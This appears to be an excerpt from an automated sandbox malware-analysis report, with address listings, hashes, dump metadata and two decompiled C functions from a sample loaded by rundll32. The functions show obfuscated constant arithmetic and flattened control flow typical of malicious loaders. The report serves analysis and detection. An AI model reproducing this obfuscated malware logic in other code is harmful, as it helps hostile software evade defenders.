                                                                                                                                                            0x00391196
                                                                                                                                                            0x0039119c
                                                                                                                                                            0x003911a4
                                                                                                                                                            0x003911b1
                                                                                                                                                            0x003911b2
                                                                                                                                                            0x003911bc
                                                                                                                                                            0x003911c5
                                                                                                                                                            0x003911c9
                                                                                                                                                            0x003911d1
                                                                                                                                                            0x003911d1
                                                                                                                                                            0x003911d1
                                                                                                                                                            0x003911d7
                                                                                                                                                            0x003911d7
                                                                                                                                                            0x003911d7
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003911db
                                                                                                                                                            0x003911ed
                                                                                                                                                            0x003912a8
                                                                                                                                                            0x003912aa
                                                                                                                                                            0x003912af
                                                                                                                                                            0x003912b1
                                                                                                                                                            0x003912b3
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003911f3
                                                                                                                                                            0x003911f9
                                                                                                                                                            0x00391297
                                                                                                                                                            0x00391297
                                                                                                                                                            0x0039129a
                                                                                                                                                            0x0039129f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003911ff
                                                                                                                                                            0x00391205
                                                                                                                                                            0x00391277
                                                                                                                                                            0x00391278
                                                                                                                                                            0x0039127b
                                                                                                                                                            0x00391281
                                                                                                                                                            0x00391285
                                                                                                                                                            0x00391287
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0039128d
                                                                                                                                                            0x0039128d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0039128d
                                                                                                                                                            0x00391207
                                                                                                                                                            0x0039120d
                                                                                                                                                            0x0039124c
                                                                                                                                                            0x00391252
                                                                                                                                                            0x00391256
                                                                                                                                                            0x0039125d
                                                                                                                                                            0x00391261
                                                                                                                                                            0x003911d1
                                                                                                                                                            0x003911d1
                                                                                                                                                            0x003911d1
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003911d1
                                                                                                                                                            0x0039120f
                                                                                                                                                            0x00391215
                                                                                                                                                            0x0039138c
                                                                                                                                                            0x00391392
                                                                                                                                                            0x00391392
                                                                                                                                                            0x0039121b
                                                                                                                                                            0x00391221
                                                                                                                                                            0x00391373
                                                                                                                                                            0x00391373
                                                                                                                                                            0x00391379
                                                                                                                                                            0x003911d7
                                                                                                                                                            0x003911d7
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003911d7
                                                                                                                                                            0x00391227
                                                                                                                                                            0x0039122b
                                                                                                                                                            0x00391233
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00391233
                                                                                                                                                            0x00391221
                                                                                                                                                            0x00391215
                                                                                                                                                            0x0039120d
                                                                                                                                                            0x00391205
                                                                                                                                                            0x003911f9
                                                                                                                                                            0x0039139b
                                                                                                                                                            0x003913a1
                                                                                                                                                            0x003913a7
                                                                                                                                                            0x003913ac
                                                                                                                                                            0x003913ac
                                                                                                                                                            0x003912c4
                                                                                                                                                            0x003912ca
                                                                                                                                                            0x003912d5
                                                                                                                                                            0x003912dc
                                                                                                                                                            0x0039131e
                                                                                                                                                            0x00391333
                                                                                                                                                            0x0039133c
                                                                                                                                                            0x0039134a
                                                                                                                                                            0x0039134e
                                                                                                                                                            0x00391351
                                                                                                                                                            0x00391354
                                                                                                                                                            0x00391361
                                                                                                                                                            0x00391366
                                                                                                                                                            0x00391366
                                                                                                                                                            0x00391369
                                                                                                                                                            0x0039136d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0039136d
                                                                                                                                                            0x003911d7

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4t$=r;$_O\$mWv$N$Zh
                                                                                                                                                            • API String ID: 0-2036408213
                                                                                                                                                            • Opcode ID: 43a00201618f9fcfcf05d0cebaccb506694e36bd69328a155a18b2583dff38b1
                                                                                                                                                            • Instruction ID: e14e4cc02be6eb6bfbe3325ebdfd8dfc6e5a35aa98e92bc4e4df51f4889e1d86
                                                                                                                                                            • Opcode Fuzzy Hash: 43a00201618f9fcfcf05d0cebaccb506694e36bd69328a155a18b2583dff38b1
                                                                                                                                                            • Instruction Fuzzy Hash: A1C141715083819FC319CF25C48945BBFE1FBC9358F508A0EF59AAA260D3B5D949CF86
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 0038D389 Relevance: 7.7, Strings: 6, Instructions: 243COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 83%
                                                                                                                                                            			E0038D389(void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _v60;
				char _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				void* __ecx;
				char _t245;
				void* _t263;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				void* _t280;
				void* _t306;
				intOrPtr _t307;
				char _t308;
				signed int* _t311;

				_push(_a28);
				_t306 = __edx;
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(__edx);
				_t245 = E003820B9(0);
				_v72 = _t245;
				_t311 =  &(( &_v168)[9]);
				_v84 = 0xd8cd3;
				_t307 = _t245;
				_v84 = _v84 ^ 0x2f0b54cb;
				_v84 = _v84 ^ 0x2f06dc18;
				_t280 = 0xd3d1227;
				_v116 = 0xdf2f98;
				_v116 = _v116 >> 4;
				_v116 = _v116 | 0xd629951a;
				_v116 = _v116 ^ 0xd62df7db;
				_v120 = 0x9d2532;
				_v120 = _v120 | 0x60368432;
				_v120 = _v120 << 1;
				_v120 = _v120 ^ 0xc1706bd2;
				_v104 = 0x3ed100;
				_v104 = _v104 >> 0xd;
				_v104 = _v104 << 0x10;
				_v104 = _v104 ^ 0x01fb42fe;
				_v132 = 0xac3ff1;
				_v132 = _v132 << 1;
				_v132 = _v132 ^ 0x8b709814;
				_v132 = _v132 + 0xffff5c55;
				_v132 = _v132 ^ 0x8a223f6b;
				_v164 = 0xc1955c;
				_v164 = _v164 + 0xe851;
				_v164 = _v164 >> 5;
				_t272 = 0x7c;
				_v164 = _v164 / _t272;
				_v164 = _v164 ^ 0x000d6983;
				_v76 = 0x371de3;
				_v76 = _v76 >> 1;
				_v76 = _v76 ^ 0x00157680;
				_v156 = 0xc7985;
				_v156 = _v156 + 0xffff997a;
				_v156 = _v156 + 0x5493;
				_v156 = _v156 ^ 0xa8ab967c;
				_v156 = _v156 ^ 0xa8a621f4;
				_v92 = 0xd6ada;
				_v92 = _v92 + 0xf102;
				_v92 = _v92 ^ 0x00049005;
				_v152 = 0xbb1df2;
				_t273 = 0x71;
				_v152 = _v152 * 0x37;
				_v152 = _v152 << 2;
				_v152 = _v152 + 0x7572;
				_v152 = _v152 ^ 0xa0c338c0;
				_v108 = 0xfb68a6;
				_v108 = _v108 / _t273;
				_v108 = _v108 * 0x38;
				_v108 = _v108 ^ 0x00745d8a;
				_v160 = 0x9cfb41;
				_v160 = _v160 >> 0xd;
				_v160 = _v160 + 0xffff2425;
				_v160 = _v160 | 0xc56bf860;
				_v160 = _v160 ^ 0xffffb927;
				_v100 = 0xcc3697;
				_v100 = _v100 << 9;
				_t274 = 0x3d;
				_v100 = _v100 / _t274;
				_v100 = _v100 ^ 0x027f162e;
				_v124 = 0x5e8102;
				_v124 = _v124 << 1;
				_v124 = _v124 >> 4;
				_v124 = _v124 ^ 0x000928e5;
				_v96 = 0x9a5083;
				_v96 = _v96 + 0xffff88fb;
				_v96 = _v96 | 0x7e2ee754;
				_v96 = _v96 ^ 0x7eb15945;
				_v168 = 0x417f4c;
				_v168 = _v168 + 0x30ef;
				_v168 = _v168 + 0xffff0fcf;
				_v168 = _v168 | 0x766f950c;
				_v168 = _v168 ^ 0x7667a907;
				_v148 = 0xeb5ea2;
				_v148 = _v148 >> 1;
				_v148 = _v148 | 0xdbfe62fd;
				_v148 = _v148 ^ 0xdbf81284;
				_v88 = 0xc982d2;
				_v88 = _v88 | 0xbf502ba4;
				_v88 = _v88 ^ 0xbfda3d08;
				_v80 = 0x51a7e7;
				_v80 = _v80 | 0xcf4b4eb1;
				_v80 = _v80 ^ 0xcf5d8599;
				_v140 = 0x112038;
				_v140 = _v140 >> 0xc;
				_v140 = _v140 | 0x79e3f6d0;
				_v140 = _v140 >> 0xc;
				_v140 = _v140 ^ 0x000d6368;
				_v144 = 0x3c4be1;
				_v144 = _v144 << 1;
				_t275 = 0x51;
				_v144 = _v144 / _t275;
				_t276 = 0x44;
				_v144 = _v144 / _t276;
				_v144 = _v144 ^ 0x0006a926;
				_v112 = 0xebe610;
				_t277 = 6;
				_v112 = _v112 / _t277;
				_v112 = _v112 ^ 0x8e2a0175;
				_v112 = _v112 ^ 0x8e0783c0;
				_v128 = 0x507b99;
				_v128 = _v128 ^ 0xb6dd86a4;
				_v128 = _v128 + 0xffff6e9b;
				_v128 = _v128 * 0x6f;
				_v128 = _v128 ^ 0x275b8ca8;
				_v136 = 0x1b49e9;
				_v136 = _v136 * 0x22;
				_v136 = _v136 ^ 0x6bc19a50;
				_v136 = _v136 ^ 0xda04c504;
				_v136 = _v136 ^ 0xb25c1cc6;
				do {
					while(_t280 != 0x9b6c7ef) {
						if(_t280 == 0xd3d1227) {
							_t280 = 0x9b6c7ef;
							continue;
						} else {
							if(_t280 == 0xd8aa277) {
								E00389008(_v72, _v128, _v136);
							} else {
								_t317 = _t280 - 0xdb35d55;
								if(_t280 != 0xdb35d55) {
									goto L10;
								} else {
									_push(_v164);
									_push(_v132);
									_t308 = 0x44;
									E00374B61( &_v68, _t308);
									_push(_v92);
									_v68 = _t308;
									_push(_v156);
									_t284 = _v76;
									_v60 = E0038DCF7(_v76, 0x37173c, _t317);
									_t307 = E0038DE10( &_v68, _v152, _t306, _v116 | _v84, _v76, _a12, _v108, 0, _a28, _v160, _v72, _v100, _v124, _v96, _t284, _t284, _v168, _v148, _t284, _v88, _v80, _v140);
									E0037A8B0(_v144, _v60, _v112);
									_t311 =  &(_t311[0x19]);
									_t280 = 0xd8aa277;
									continue;
								}
							}
						}
						L13:
						return _t307;
					}
					_t263 = E00374241(_t280, _v120,  &_v72, _a28, _v104);
					_t311 =  &(_t311[3]);
					__eflags = _t263;
					if(_t263 == 0) {
						_t280 = 0xcb447d9;
						goto L10;
					} else {
						_t280 = 0xdb35d55;
						continue;
					}
					goto L13;
					L10:
					__eflags = _t280 - 0xcb447d9;
				} while (_t280 != 0xcb447d9);
				goto L13;
			}












































                                                                                                                                                            0x0038d393
                                                                                                                                                            0x0038d39c
                                                                                                                                                            0x0038d39e
                                                                                                                                                            0x0038d3a5
                                                                                                                                                            0x0038d3a6
                                                                                                                                                            0x0038d3ad
                                                                                                                                                            0x0038d3b4
                                                                                                                                                            0x0038d3b5
                                                                                                                                                            0x0038d3bc
                                                                                                                                                            0x0038d3be
                                                                                                                                                            0x0038d3c3
                                                                                                                                                            0x0038d3ca
                                                                                                                                                            0x0038d3cd
                                                                                                                                                            0x0038d3d5
                                                                                                                                                            0x0038d3d7
                                                                                                                                                            0x0038d3e1
                                                                                                                                                            0x0038d3e9
                                                                                                                                                            0x0038d3ee
                                                                                                                                                            0x0038d3f6
                                                                                                                                                            0x0038d3fb
                                                                                                                                                            0x0038d403
                                                                                                                                                            0x0038d40b
                                                                                                                                                            0x0038d413
                                                                                                                                                            0x0038d41b
                                                                                                                                                            0x0038d41f
                                                                                                                                                            0x0038d427
                                                                                                                                                            0x0038d42f
                                                                                                                                                            0x0038d434
                                                                                                                                                            0x0038d439
                                                                                                                                                            0x0038d441
                                                                                                                                                            0x0038d449
                                                                                                                                                            0x0038d44d
                                                                                                                                                            0x0038d455
                                                                                                                                                            0x0038d45d
                                                                                                                                                            0x0038d465
                                                                                                                                                            0x0038d46d
                                                                                                                                                            0x0038d475
                                                                                                                                                            0x0038d480
                                                                                                                                                            0x0038d485
                                                                                                                                                            0x0038d48b
                                                                                                                                                            0x0038d493
                                                                                                                                                            0x0038d49b
                                                                                                                                                            0x0038d49f
                                                                                                                                                            0x0038d4a7
                                                                                                                                                            0x0038d4af
                                                                                                                                                            0x0038d4b7
                                                                                                                                                            0x0038d4bf
                                                                                                                                                            0x0038d4c7
                                                                                                                                                            0x0038d4cf
                                                                                                                                                            0x0038d4d7
                                                                                                                                                            0x0038d4df
                                                                                                                                                            0x0038d4e7
                                                                                                                                                            0x0038d4f4
                                                                                                                                                            0x0038d4f5
                                                                                                                                                            0x0038d4f9
                                                                                                                                                            0x0038d4fe
                                                                                                                                                            0x0038d506
                                                                                                                                                            0x0038d50e
                                                                                                                                                            0x0038d51c
                                                                                                                                                            0x0038d525
                                                                                                                                                            0x0038d529
                                                                                                                                                            0x0038d531
                                                                                                                                                            0x0038d539
                                                                                                                                                            0x0038d53e
                                                                                                                                                            0x0038d546
                                                                                                                                                            0x0038d54e
                                                                                                                                                            0x0038d558
                                                                                                                                                            0x0038d565
                                                                                                                                                            0x0038d570
                                                                                                                                                            0x0038d575
                                                                                                                                                            0x0038d57b
                                                                                                                                                            0x0038d583
                                                                                                                                                            0x0038d58b
                                                                                                                                                            0x0038d58f
                                                                                                                                                            0x0038d594
                                                                                                                                                            0x0038d59c
                                                                                                                                                            0x0038d5a4
                                                                                                                                                            0x0038d5ac
                                                                                                                                                            0x0038d5b4
                                                                                                                                                            0x0038d5bc
                                                                                                                                                            0x0038d5c4
                                                                                                                                                            0x0038d5cc
                                                                                                                                                            0x0038d5d4
                                                                                                                                                            0x0038d5dc
                                                                                                                                                            0x0038d5e4
                                                                                                                                                            0x0038d5ec
                                                                                                                                                            0x0038d5f0
                                                                                                                                                            0x0038d5f8
                                                                                                                                                            0x0038d600
                                                                                                                                                            0x0038d608
                                                                                                                                                            0x0038d610
                                                                                                                                                            0x0038d618
                                                                                                                                                            0x0038d620
                                                                                                                                                            0x0038d628
                                                                                                                                                            0x0038d630
                                                                                                                                                            0x0038d638
                                                                                                                                                            0x0038d63d
                                                                                                                                                            0x0038d645
                                                                                                                                                            0x0038d64a
                                                                                                                                                            0x0038d652
                                                                                                                                                            0x0038d65a
                                                                                                                                                            0x0038d662
                                                                                                                                                            0x0038d667
                                                                                                                                                            0x0038d671
                                                                                                                                                            0x0038d676
                                                                                                                                                            0x0038d67c
                                                                                                                                                            0x0038d684
                                                                                                                                                            0x0038d690
                                                                                                                                                            0x0038d698
                                                                                                                                                            0x0038d69c
                                                                                                                                                            0x0038d6a4
                                                                                                                                                            0x0038d6ac
                                                                                                                                                            0x0038d6b4
                                                                                                                                                            0x0038d6bc
                                                                                                                                                            0x0038d6c9
                                                                                                                                                            0x0038d6cd
                                                                                                                                                            0x0038d6d5
                                                                                                                                                            0x0038d6e2
                                                                                                                                                            0x0038d6e6
                                                                                                                                                            0x0038d6ee
                                                                                                                                                            0x0038d6f6
                                                                                                                                                            0x0038d6fe
                                                                                                                                                            0x0038d6fe
                                                                                                                                                            0x0038d70c
                                                                                                                                                            0x0038d7ec
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038d712
                                                                                                                                                            0x0038d718
                                                                                                                                                            0x0038d839
                                                                                                                                                            0x0038d71e
                                                                                                                                                            0x0038d71e
                                                                                                                                                            0x0038d720
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038d726
                                                                                                                                                            0x0038d726
                                                                                                                                                            0x0038d72e
                                                                                                                                                            0x0038d734
                                                                                                                                                            0x0038d737
                                                                                                                                                            0x0038d73c
                                                                                                                                                            0x0038d745
                                                                                                                                                            0x0038d74c
                                                                                                                                                            0x0038d750
                                                                                                                                                            0x0038d75c
                                                                                                                                                            0x0038d7d4
                                                                                                                                                            0x0038d7da
                                                                                                                                                            0x0038d7df
                                                                                                                                                            0x0038d7e2
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038d7e2
                                                                                                                                                            0x0038d720
                                                                                                                                                            0x0038d718
                                                                                                                                                            0x0038d840
                                                                                                                                                            0x0038d84b
                                                                                                                                                            0x0038d84b
                                                                                                                                                            0x0038d807
                                                                                                                                                            0x0038d80c
                                                                                                                                                            0x0038d80f
                                                                                                                                                            0x0038d811
                                                                                                                                                            0x0038d81a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038d813
                                                                                                                                                            0x0038d813
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038d813
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038d81f
                                                                                                                                                            0x0038d81f
                                                                                                                                                            0x0038d81f
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: T.~$hc$ru$($0$K<
                                                                                                                                                            • API String ID: 0-2343433060
                                                                                                                                                            • Opcode ID: 50097c7c6200918f5a99e6a5c161709aac9a69d774ceab9d9cf151561a3cce55
                                                                                                                                                            • Instruction ID: 0e3849757a9a6999c3e92711cd6f58d0e72a368d4292b197f1b15f33987dc04f
                                                                                                                                                            • Opcode Fuzzy Hash: 50097c7c6200918f5a99e6a5c161709aac9a69d774ceab9d9cf151561a3cce55
                                                                                                                                                            • Instruction Fuzzy Hash: 3BC133725083809FD769CF21C986A5BFBE1FBD5704F104A1DF29A96260D7B68908CF43
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00373E3F Relevance: 7.7, Strings: 6, Instructions: 217COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 97%
                                                                                                                                                            			E00373E3F() {
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				void* _t213;
				signed int _t214;
				void* _t216;
				signed int _t222;
				intOrPtr _t223;
				signed int _t224;
				signed int _t225;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				void* _t230;
				void* _t236;
				void* _t257;
				signed int* _t261;

				_t261 =  &_v100;
				_v8 = 0xc74bd8;
				_v4 = 0;
				_v72 = 0x3d4417;
				_v72 = _v72 << 8;
				_v72 = _v72 + 0xffff33fd;
				_v72 = _v72 ^ 0xbd434afc;
				_v32 = 0xa9ac19;
				_v32 = _v32 + 0x4aca;
				_v32 = _v32 ^ 0x00a9f6e1;
				_v40 = 0x1f6a8;
				_v12 = 0;
				_v40 = _v40 * 0x6f;
				_t257 = 0xf52a3f4;
				_v40 = _v40 ^ 0x00d19880;
				_v44 = 0x168b17;
				_v44 = _v44 + 0x13a5;
				_v44 = _v44 ^ 0x001ee95f;
				_v48 = 0xfac2ed;
				_v48 = _v48 + 0xffff2a35;
				_v48 = _v48 ^ 0x00fbd9f9;
				_v92 = 0xc00c53;
				_v92 = _v92 + 0xffff1aa9;
				_v92 = _v92 + 0xf2d7;
				_t225 = 0x68;
				_v92 = _v92 / _t225;
				_v92 = _v92 ^ 0x0000565c;
				_v68 = 0xf2ac97;
				_v68 = _v68 ^ 0x99fc0549;
				_v68 = _v68 >> 0xf;
				_v68 = _v68 ^ 0x000a8804;
				_v24 = 0xf89d13;
				_t226 = 0x49;
				_v24 = _v24 / _t226;
				_v24 = _v24 ^ 0x000ed122;
				_v96 = 0x9976f7;
				_v96 = _v96 >> 0xe;
				_v96 = _v96 ^ 0xdd1af6ea;
				_v96 = _v96 ^ 0x684d855d;
				_v96 = _v96 ^ 0xb5551d4c;
				_v28 = 0x12a2d6;
				_t227 = 0xe;
				_v28 = _v28 * 0x29;
				_v28 = _v28 ^ 0x02ffade5;
				_v100 = 0x1d8880;
				_v100 = _v100 + 0x8a1e;
				_v100 = _v100 * 0x7c;
				_v100 = _v100 + 0xffff421a;
				_v100 = _v100 ^ 0x0e9f1559;
				_v36 = 0x784079;
				_v36 = _v36 / _t227;
				_v36 = _v36 ^ 0x0007caf6;
				_v60 = 0xd037f8;
				_v60 = _v60 >> 0xf;
				_v60 = _v60 + 0xfffff3b4;
				_v60 = _v60 ^ 0xfff3df4e;
				_v64 = 0x95f516;
				_v64 = _v64 + 0xffffc55a;
				_v64 = _v64 | 0x523f0ae6;
				_v64 = _v64 ^ 0x52b19695;
				_v84 = 0x271827;
				_v84 = _v84 + 0xffff7017;
				_v84 = _v84 + 0x1e15;
				_v84 = _v84 ^ 0xa1c53b6b;
				_v84 = _v84 ^ 0xa1e64a9e;
				_v52 = 0x3d5883;
				_v52 = _v52 >> 5;
				_v52 = _v52 << 3;
				_v52 = _v52 ^ 0x000b56f4;
				_v56 = 0xd5acf2;
				_v56 = _v56 ^ 0x15c9a5cd;
				_v56 = _v56 << 3;
				_v56 = _v56 ^ 0xa8e6808a;
				_v88 = 0xcc2476;
				_v88 = _v88 + 0x4ceb;
				_v88 = _v88 ^ 0xdbab884b;
				_t228 = 0x4f;
				_v88 = _v88 / _t228;
				_v88 = _v88 ^ 0x02ce2d39;
				_v20 = 0x9b21e;
				_v20 = _v20 + 0x218b;
				_v20 = _v20 ^ 0x00037084;
				_v76 = 0xcba48;
				_t229 = 0x5a;
				_t222 = _v12;
				_v76 = _v76 * 0x7b;
				_v76 = _v76 + 0x3acc;
				_v76 = _v76 << 0x10;
				_v76 = _v76 ^ 0xbb6cb0a9;
				_v80 = 0x9c886e;
				_v80 = _v80 ^ 0x88757b42;
				_t230 = 0x5c;
				_v80 = _v80 / _t229;
				_v80 = _v80 << 0xe;
				_v80 = _v80 ^ 0x5c6ae118;
				while(1) {
					L1:
					_t213 = 0xa360d2e;
					do {
						while(_t257 != _t213) {
							if(_t257 == 0xb87cfc3) {
								_t223 =  *0x393e10; // 0x0
								_t224 = _t223 + 0x1c;
								while(1) {
									__eflags =  *_t224 - _t230;
									if(__eflags == 0) {
										break;
									}
									_t224 = _t224 + 2;
									__eflags = _t224;
								}
								_t222 = _t224 + 2;
								_t257 = 0xc7301de;
								goto L1;
							} else {
								if(_t257 == 0xc7301de) {
									_push(_v48);
									_push(_v44);
									_t216 = E0038DCF7(_v40, 0x371080, __eflags);
									_pop(_t236);
									__eflags = E0037AAD6(_t216, _v92, _v68, _v72, _t236, _t236, _v24, _v96, _v28, _t236,  &_v16, _v100, _t236, _v32, _t236, _v36);
									_t257 =  ==  ? 0xa360d2e : 0x57f878b;
									E0037A8B0(_v60, _t216, _v64);
									_t261 =  &(_t261[0xf]);
									L14:
									_t213 = 0xa360d2e;
									_t230 = 0x5c;
									goto L15;
								} else {
									if(_t257 == 0xdd28c3f) {
										E00371FD1(_v20, _v76, _v80, _v16);
									} else {
										if(_t257 != 0xf52a3f4) {
											goto L15;
										} else {
											_t257 = 0xb87cfc3;
											continue;
										}
									}
								}
							}
							L18:
							return _v12;
						}
						_t214 = E00371F53(_v16, _v84, _v52, _t222, _v56, _v88);
						_t261 =  &(_t261[4]);
						__eflags = _t214;
						_t257 = 0xdd28c3f;
						_t191 = _t214 == 0;
						__eflags = _t191;
						_v12 = 0 | _t191;
						goto L14;
						L15:
						__eflags = _t257 - 0x57f878b;
					} while (__eflags != 0);
					goto L18;
				}
			}











































                                                                                                                                                            0x00373e3f
                                                                                                                                                            0x00373e42
                                                                                                                                                            0x00373e4c
                                                                                                                                                            0x00373e52
                                                                                                                                                            0x00373e5a
                                                                                                                                                            0x00373e5f
                                                                                                                                                            0x00373e67
                                                                                                                                                            0x00373e6f
                                                                                                                                                            0x00373e77
                                                                                                                                                            0x00373e7f
                                                                                                                                                            0x00373e87
                                                                                                                                                            0x00373e8f
                                                                                                                                                            0x00373e9c
                                                                                                                                                            0x00373ea0
                                                                                                                                                            0x00373ea5
                                                                                                                                                            0x00373ead
                                                                                                                                                            0x00373eb5
                                                                                                                                                            0x00373ebd
                                                                                                                                                            0x00373ec5
                                                                                                                                                            0x00373ecd
                                                                                                                                                            0x00373ed5
                                                                                                                                                            0x00373edd
                                                                                                                                                            0x00373ee5
                                                                                                                                                            0x00373eed
                                                                                                                                                            0x00373efb
                                                                                                                                                            0x00373f00
                                                                                                                                                            0x00373f06
                                                                                                                                                            0x00373f0e
                                                                                                                                                            0x00373f16
                                                                                                                                                            0x00373f1e
                                                                                                                                                            0x00373f23
                                                                                                                                                            0x00373f2b
                                                                                                                                                            0x00373f37
                                                                                                                                                            0x00373f3c
                                                                                                                                                            0x00373f42
                                                                                                                                                            0x00373f4a
                                                                                                                                                            0x00373f52
                                                                                                                                                            0x00373f57
                                                                                                                                                            0x00373f5f
                                                                                                                                                            0x00373f67
                                                                                                                                                            0x00373f6f
                                                                                                                                                            0x00373f7c
                                                                                                                                                            0x00373f7d
                                                                                                                                                            0x00373f81
                                                                                                                                                            0x00373f89
                                                                                                                                                            0x00373f91
                                                                                                                                                            0x00373f9e
                                                                                                                                                            0x00373fa2
                                                                                                                                                            0x00373faa
                                                                                                                                                            0x00373fb2
                                                                                                                                                            0x00373fc0
                                                                                                                                                            0x00373fc4
                                                                                                                                                            0x00373fcc
                                                                                                                                                            0x00373fd4
                                                                                                                                                            0x00373fd9
                                                                                                                                                            0x00373fe1
                                                                                                                                                            0x00373fe9
                                                                                                                                                            0x00373ff1
                                                                                                                                                            0x00373ff9
                                                                                                                                                            0x00374001
                                                                                                                                                            0x00374009
                                                                                                                                                            0x00374011
                                                                                                                                                            0x00374019
                                                                                                                                                            0x00374023
                                                                                                                                                            0x00374030
                                                                                                                                                            0x00374038
                                                                                                                                                            0x00374040
                                                                                                                                                            0x00374045
                                                                                                                                                            0x0037404a
                                                                                                                                                            0x00374052
                                                                                                                                                            0x0037405a
                                                                                                                                                            0x00374062
                                                                                                                                                            0x00374067
                                                                                                                                                            0x0037406f
                                                                                                                                                            0x00374077
                                                                                                                                                            0x0037407f
                                                                                                                                                            0x0037408d
                                                                                                                                                            0x00374092
                                                                                                                                                            0x00374098
                                                                                                                                                            0x003740a0
                                                                                                                                                            0x003740a8
                                                                                                                                                            0x003740b0
                                                                                                                                                            0x003740b8
                                                                                                                                                            0x003740c5
                                                                                                                                                            0x003740c6
                                                                                                                                                            0x003740cc
                                                                                                                                                            0x003740d0
                                                                                                                                                            0x003740d8
                                                                                                                                                            0x003740dd
                                                                                                                                                            0x003740e5
                                                                                                                                                            0x003740ed
                                                                                                                                                            0x003740fb
                                                                                                                                                            0x003740fc
                                                                                                                                                            0x00374100
                                                                                                                                                            0x00374105
                                                                                                                                                            0x0037410d
                                                                                                                                                            0x0037410d
                                                                                                                                                            0x0037410d
                                                                                                                                                            0x00374112
                                                                                                                                                            0x00374112
                                                                                                                                                            0x0037411c
                                                                                                                                                            0x003741bb
                                                                                                                                                            0x003741c1
                                                                                                                                                            0x003741c9
                                                                                                                                                            0x003741c9
                                                                                                                                                            0x003741cc
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003741c6
                                                                                                                                                            0x003741c6
                                                                                                                                                            0x003741c6
                                                                                                                                                            0x003741ce
                                                                                                                                                            0x003741d1
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00374122
                                                                                                                                                            0x00374128
                                                                                                                                                            0x00374146
                                                                                                                                                            0x0037414f
                                                                                                                                                            0x00374157
                                                                                                                                                            0x0037415d
                                                                                                                                                            0x003741a0
                                                                                                                                                            0x003741ae
                                                                                                                                                            0x003741b1
                                                                                                                                                            0x003741b6
                                                                                                                                                            0x00374208
                                                                                                                                                            0x0037420a
                                                                                                                                                            0x0037420f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037412a
                                                                                                                                                            0x00374130
                                                                                                                                                            0x0037422e
                                                                                                                                                            0x00374136
                                                                                                                                                            0x0037413c
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00374142
                                                                                                                                                            0x00374142
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00374142
                                                                                                                                                            0x0037413c
                                                                                                                                                            0x00374130
                                                                                                                                                            0x00374128
                                                                                                                                                            0x00374235
                                                                                                                                                            0x00374240
                                                                                                                                                            0x00374240
                                                                                                                                                            0x003741f0
                                                                                                                                                            0x003741f7
